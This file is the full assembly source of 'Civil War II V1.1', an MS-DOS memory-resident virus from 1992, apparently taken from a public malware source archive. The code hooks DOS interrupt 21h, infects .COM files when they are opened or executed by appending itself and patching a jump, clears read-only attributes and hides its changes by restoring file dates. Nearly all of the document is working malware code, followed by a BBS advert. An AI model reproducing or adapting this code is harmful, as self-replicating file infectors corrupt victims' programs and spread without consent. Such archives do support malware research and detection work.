MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.civil_ii.asm
2021-01-12 17:34:47 -06:00

309 lines
8.0 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;****************************************************************************
; Civil War II V1.1 *
; *
; Assembled with Tasm 2.5 *
; (c) 1992 Trident/Dark Helmet, The Netherlands *
; *
;****************************************************************************
; *
; Civil War... *
; *
; "For all I've seen has change my mind *
; But still the wars go on as the years go by *
; With no love for God or human rights *
; 'Cause all these dreams are swept aside *
; By bloody hands of the hypnotized *
; Who carry the cross of homicide *
; And history bears the scars of our civil war" *
; *
;****************************************************************************
.Radix 16
Civil_War Segment
Model small
Assume cs:Civil_War, ds:Civil_War, es:Civil_War
org 100h
len equ offset last - begin
virus_len equ len / 16d
dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection
; marker
begin: Call virus ; make call to
; push IP on stack
virus: pop bp ; get IP from stack.
sub bp,109h ; adjust IP.
restore_host: mov di,0100h ; recover beginning
lea si,ds:[carrier_begin+bp] ; of carrier program.
mov cx,06h
rep movsb
check_resident: mov ah,0a0h ; check if virus
int 21h ; already installed.
cmp ax,0001h
je end_virus
adjust_memory: mov ax,cs ; start of Memory
dec ax ; Control Block
mov ds,ax
cmp byte ptr ds:[0000],5a ; check if last
; block
jne abort ; if not last block
; end
mov ax,ds:[0003] ; decrease memory
sub ax,40 ; by 1kbyte lenght
mov ds:[0003],ax
sub word ptr ds:[0012],40h
install_virus: mov bx,ax ; es point to start
mov ax,es ; virus in memory
add ax,bx
mov es,ax
mov cx,len ; cx = lenght virus
mov ax,ds ; restore ds
inc ax
mov ds,ax
lea si,ds:[begin+bp] ; point to start virus
lea di,es:0100 ; point to destination
rep movsb ; copy virus in
; memory
mov [virus_segment+bp],es ; store start virus
; in memory
mov ax,cs ; restore es
mov es,ax
hook_vector: cli ; no interups
mov ax,3521h ; revector int 21
int 21h
mov ds,[virus_segment+bp]
mov old_21h-6h,bx
mov old_21h+2-6h,es
mov dx,offset main_virus - 6h
mov ax,2521h
int 21h
sti
abort: mov ax,cs
mov ds,ax
mov es,ax
end_virus: mov bx,0100h ; jump to begin
jmp bx ; host file
;*****************************************************************************
main_virus: pushf
cmp ah,0a0h ; check virus call
jne new_21h ; no virus call
mov ax,0001h ; ax = id
popf ; return id
iret
new_21h: push ds ; save registers
push es
push di
push si
push ax
push bx
push cx
push dx
check_open: cmp ah,3dh
je chk_com
check_exec: cmp ax,04b00h ; exec function?
je chk_com
continu: pop dx ; restore registers
pop cx
pop bx
pop ax
pop si
pop di
pop es
pop ds
popf
jmp dword ptr cs:[old_21h-6]
chk_com: mov cs:[name_seg-6],ds
mov cs:[name_off-6],dx
cld ; check extension
mov di,dx ; for COM
push ds
pop es
mov al,'.' ; search extension
repne scasb ; check for 'COM"
cmp word ptr es:[di],'OC' ; check 'CO'
jne continu
cmp word ptr es:[di+2],'M' ; check 'M'
jne continu
call set_int24h
call set_atribuut
open_file: mov ds,cs:[name_seg-6]
mov dx,cs:[name_off-6]
mov ax,3D02h ; open file
call do_int21h
jc close_file
push cs
pop ds
mov [handle-6],ax
mov bx,ax
call get_date
check_infect: push cs
pop ds
mov bx,[handle-6] ; read first 6 bytes
mov ah,3fh
mov cx,06h
lea dx,[carrier_begin-6]
call do_int21h
mov al, byte ptr [carrier_begin-6]+3 ; check initials
mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H'
cmp ax,[initials-6]
je save_date ; if equal already
; infect
get_lenght: mov ax,4200h ; file pointer begin
call move_pointer
mov ax,4202h ; file pointer end
call move_pointer
sub ax,03h ; ax = filelenght
mov [lenght_file-6],ax
call write_jmp
call write_virus
save_date: push cs
pop ds
mov bx,[handle-6]
mov dx,[date-6]
mov cx,[time-6]
mov ax,5701h
call do_int21h
close_file: mov bx,[handle-6]
mov ah,03eh ; close file
call do_int21h
mov dx,cs:[old_24h-6] ; restore int24h
mov ds,cs:[old_24h+2-6]
mov ax,2524h
call do_int21h
jmp continu
new_24h: mov al,3
iret
;---------------------------------------------------------------------------
; PROCEDURES
;---------------------------------------------------------------------------
move_pointer: push cs
pop ds
mov bx,[handle-6]
xor cx,cx
xor dx,dx
call do_int21h
ret
do_int21h: pushf
call dword ptr cs:[old_21h-6]
ret
write_jmp: push cs
pop ds
mov ax,4200h
call move_pointer
mov ah,40h
mov cx,01h
lea dx,[jump-6]
call do_int21h
mov ah,40h
mov cx,02h
lea dx,[lenght_file-6]
call do_int21h
mov ah,40h
mov cx,02h
lea dx,[initials-6]
call do_int21h
ret
write_virus: push cs
pop ds
mov ax,4202h
call move_pointer
mov ah,40
mov cx,len
mov dx,100
call do_int21h
ret
get_date: mov ax,5700h
call do_int21h
push cs
pop ds
mov [date-6],dx
mov [time-6],cx
ret
set_int24h: mov ax,3524h
call do_int21h
mov cs:[old_24h-6],bx
mov cs:[old_24h+2-6],es
mov dx,offset new_24h-6
push cs
pop ds
mov ax,2524h
call do_int21h
ret
set_atribuut: mov ax,4300h ; get atribuut
mov ds,cs:[name_seg-6]
mov dx,cs:[name_off-6]
call do_int21h
and cl,0feh ; set atribuut
mov ax,4301h
call do_int21h
ret
;---------------------------------------------------------------------------
; DATA
;---------------------------------------------------------------------------
old_21h dw 00h,00h
old_24h dw 00h,00h
carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h
text db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet, The Netherlands',00h
jump db 0e9h
name_seg dw ?
name_off dw ?
virus_segment dw ?
lenght_file dw ?
handle dw ?
date dw ?
time dw ?
initials dw 4844h
last db 090h
Civil_war ends
end dummy

;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;